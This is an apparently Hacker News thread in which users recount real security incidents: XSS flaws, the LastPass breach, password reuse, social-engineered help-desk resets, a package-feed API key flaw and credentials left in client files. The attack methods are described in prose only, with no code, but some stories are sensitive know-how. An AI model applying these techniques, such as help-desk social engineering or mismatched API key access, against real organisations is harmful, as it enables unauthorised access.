Real-life, ridiculous security incidents?

Big fails from small things are common. A few recent examples off the top of my head -

  1. Bing.com had an issue whereby attackers could inject XSS code to all visitors, due to a simple misconfiguration in Azure.
  2. Visual Studio Code had a Remote Code Execution vulnerability triggered by a simple link.
  3. LastPass had all of its secrets and backups taken via a compromised developer's machine.
  4. CircleCI was breached and leaked everyone's OAuth tokens and secrets by malware.
  5. Heroku and Okta were breached due to a compromised token, had their source code taken, and potentially leaked customer secrets.

[1] https://www.wiz.io/blog/azure-active-directory-bing-misconfi...

[2] https://github.com/google/security-research/security/advisor...

[3] https://blog.lastpass.com/2023/03/security-incident-update-r...

[4] https://circleci.com/blog/january-4-2023-security-alert/

[5] https://status.heroku.com/incidents/2413 https://www.bleepingcomputer.com/news/security/oktas-source-...

I discovered a SQL injection vulnerability in the credit card rewards site of a major US bank in 2011. A VP finally called me a day later and asked what I wanted — they thought I was a hacker trying to extort them, he told me they had been in meetings all day about it. They didn’t bother looking up my information to see that I had been an account holder for more than ten years.

The site was down for a few months while I assume they fixed and audited the whole product. They never told customers what happened.

Maybe not exactly what you're thinking, but the ol' Vegas fish tank hack always comes to mind when I think of ridiculous hacks:

Casino Gets Hacked Through Its Internet-Connected Fish Tank Thermometer

https://thehackernews.com/2018/04/iot-hacking-thermometer.ht...

The most terrifying one I've ever heard of was a major global bank[1] who received a call from a national telco about a bill for a leased line to one of their data centers that had been unpaid for 6 months. They had no records of this line.

The attacker had managed to get an unmonitored physical connection installed directly in their data center and was able to exfiltrate data completely without any limitation other than bandwidth for 6 months without detection.

This story was never reported as far as I know.

[1] I'm not going to name them but if the name came out I don't think anyone would be surprised who it was.

LastPass got taken down because they allowed a developer to work remote from their home on their own personal PC. That PC had an unpatched vulnerability within the version of Plex that the user was running.

Some hackers got into their machine on a basic hack, and then hung around long enough to poke around and find the Plex vulnerability.

They were able to inject their own code into the vulnerable Plex, and then ran a basic keylogger in the background without their knowing.

At that point, they watched the user type in their LastPass admin credentials, and at that point they had the keys to the kingdom because LastPass didn’t have better auth protection.

Many layers of the onion failed here which added up to a Swiss cheese effect. The hacks were very elementary, and nothing compared to something like Stuxnet or the NSO hacks.

Many, many years ago I was at a company where a manager (M1) wanted full root access to all of the internal servers (mostly file/web servers, router/firewall and the mail server). It's lost to the sands of time as to why, but he was persistent.

There was quite a bit of back and forth between the team that managed the servers, the owners of the company and M1. After a few weeks M1 was finally given access. Within a couple of days he brought a complaint against another manager (M2) that M2 had hijacked M1's personal email and was storing it on one of the internal servers.

Meetings were held into the night to discuss what should be done. M2 was called in, credentials revoked and they were placed on leave while an investigation could take place. Overnight every single server was compromised and no one could get in to anything.

M2 brought in a lawyer, the company brought in a lawyer and all of management and most of the employees were sat down in a room to figure out what to do about this mess.

Turns out M1 had re-used the same "password", which was a single lowercase english word, on EVERYTHING. His personal email, any account on any service maintained by the company and had changed his secure password on the superuser accounts he had just been given to the same one.

There was a literal paper trail of M1 providing this password to the majority of the people in the company. Provided in printed memos asking to have accounts set up, emails asking to have accounts set up, other people having it on the standard sticky note on monitors, M1 saying "and make the password..." in the common workspace for anyone to overhear, etc etc.

Of course, one of the servers had SSH open for remote access... and you can see where this is going.

Expensive forensics team was brought in, servers recovered, and it was determined that M1's account on the SSH server was targeted by automated logins not too long after he was added to the company's website.

M2 is cleared and brought back, M1 had their role decreased and was gone not soon after.

An employer I worked for would allow you to reset anyone's passwords by calling the help desk, providing their username, and their direct manager.

I told the ciso this and she asked how a bad actor would figure this out, I said linkedin. She didn't seem pissed so I laughed and 5 minutes later reset her password and sent an email to her self as proof.

That policy changed quick...

I've got two. The first one is a bit older, from around 2015. It was a small platform that did have a Java Web Start app for some features. It downloaded an app, where you were automatically logged in. However, when downloading it, I noticed that there was no secret or anything transferred, just your username. Turns out, the downloaded application contained a database connection string with full owner rights. As far as I know, that was never fixed.

The second one was a bit more severe, and happened just last year. At our company, we're using a service to host private package feeds for some libraries we're selling. Users get their own account, and usually use an API key authentication to get the packages. However, we've discovered that one client, although a paying customer, didn't have proper rights assigned to their account. After contacting them, it turned out they could access everything just fine, and never noticed a problem. They did have their own user account, along with their own API key. However, for the actual authentication, they used _their_ API key with _my_ account name, and that worked. The service was first checking if the API key was a valid one (which it was, for some account without any access rights), and then checked if the user did have access (which it did). But there was no check whether the API key actually belonged to the user account. So, with publicly available information (account names) and a free account to generate API keys, you could essentially access any private packages you wanted. That one was a bit more scary, and took half a year and multiple emails to finally get resolved.

My story is more of a facepalm since there was no known hack that came of it.

My former employer had a helpdesk website that was written in Perl 4 in the '90s by some interns. The users' passwords were stored in plaintext in /var/www under a subdirectory. Anyone who guessed the URL could have stolen those passwords and accessed a trove of information and data of some of the biggest financial institutions.

My coworker and I patched it up as much as we could (2018-20), upgraded it from RHEL 4 to 7/8, Perl 5, fixed the public password issue, and flagged it with management but it largely fell onto deaf ears at the time.

I am still amazed at how blatantly incompetant and reckless some companies are.

Log4j was kinda like that, abusing the logging.

Lately there’s been a number of hacks of smaller websites using methods of exfiltrating the session cookie via XSS or otherwise injecting malicious scripting (imagine if HN let you upload a script as a comment by accident, or would allow a script uploaded as a jpg).

As someone shared their findings with some bank related case, I'd like to share mine:

Approx 15 years ago I was installing POS system to one second hand store. It was just a beginning of online authorizations and there were few issues with reliability of those that time. As testing was hard, I usually tested operations by trying to make 10kEUR transaction with my expired Visa Electron card. If it worked correctly, I got "denied" response back. It was some time in November when the installation happened. I tested transactions and those went through as approved. I canceled the transaction and cancel went through also. After few tests we found out that payment terminal had some weird demo credentials and finally we got that fixed.

Then, shop finally opened on January. Shop owner called me that their bank account has now negative balance. I joked something about the issue that why he calls me about that and I forgot the thong for few days. Then, after few days he called me again and said they have started police investigation about that fraud. On same evening, I was paying my personal bills and noticed that I had about 65kEUR too much money on my account. Sent immediately message to store owner that I probably have his money but I do not know why.

Well, next day I was suspect of fraud. I started to move money back to customer, but it was not possible for some reason on one tx, it was limited to 10kEUR/day. So it took like a week until customer had their money back.

So what happened: Normally payment terminal transactions expired after three months. Meaning that bank would reject if batch includes older. That was not case here, as there was exception that if same transaction has cancel transaction on same batch, then it is accepted. But, on some later process, they rejected all the normal transactions but accepted the cancels.

So there was real bug on some bank system and bank tried to force me to sign NDA that I would not tell about this issue. I did not see any reason to sign that but most probably they fixed that very soon.

The most under rated hack in IMHO: Hacking Jenkins - Orange Tsai https://www.youtube.com/watch?v=_x8BsBnQPmU

I have seen videos of people cruising other companies jenkins dashboards. It's is horrifying, people put all kinds of keys into jenkins. Thousands of companies are rooted. Jenkins makes Wordpress look like modern secure software.

on and on, https://www.trendmicro.com/vinfo/pl/security/news/cybercrime...

Credit card skimming using XSS vulnerabilities is a pretty common attack, even in 2023. If someone can get a two line script on a checkout page, they can steal everything you type in.

Not necessarily a malicious attack, and pre-covid, but I was able to get into my "secured" office building by just tailgating or waving to the security guard, even though we're supposed to check our badges with them every day.

Back in 2014, I was trying to scrape a flash-based webpage for my employer and discovered a random XML file being downloaded by the webpage. Inside it was a commented-out admin username and password. My employer instructed me to try the credentials and they worked... I can't say what the webpage was or whose data was compromised, but for sure there were a lot of fortune x00 and other institutions you've heard of inside there.

A few years back, a game (Racecraft from Sandbox Games) had client log files point to an admin control panel behind a login page... whose login form had valid credentials inserted into it as default values.

I worked for an internet security company that shall remain nameless. We had a virus outbreak because the company president opened an email attachment.

No, they aren't happening. Everybody is sanitizing all of their user inputs in against all possible vectors and when administrators visit such user generated content and their cookies just happen to expire at that moment, they just enter their password into the dialog securely and go about their day. Their password does not grant any sort of elevated privilege to any systems.

Stop ruminating on such ridiculous fantasies and occupy your mind with something productive instead.

found an XSS on Metacritic.com a few months ago in their search results URL

didn't expect a site that big to have this kind of weakness going unnoticed for years

UPS had this XSS in mid 2021 -

https://www.bleepingcomputer.com/news/security/phishing-camp...

What is a "ridiculous security incident", is it something you think is easy after someone explains to you what happened after it happens in a void without the business logic and workplace dynamics?

Or something silly like XSS in passwords from known hackers?

This is funny especially because of the quote they managed to get, graffiti artists graffitiing anti-graffiti QR codes with pro-graffiti videos -

Melbourne Lord Mayor says 'vandalism' of QR codes for reporting graffiti 'so frustrating' - https://www.abc.net.au/news/2023-01-01/melbourne-lord-mayor-...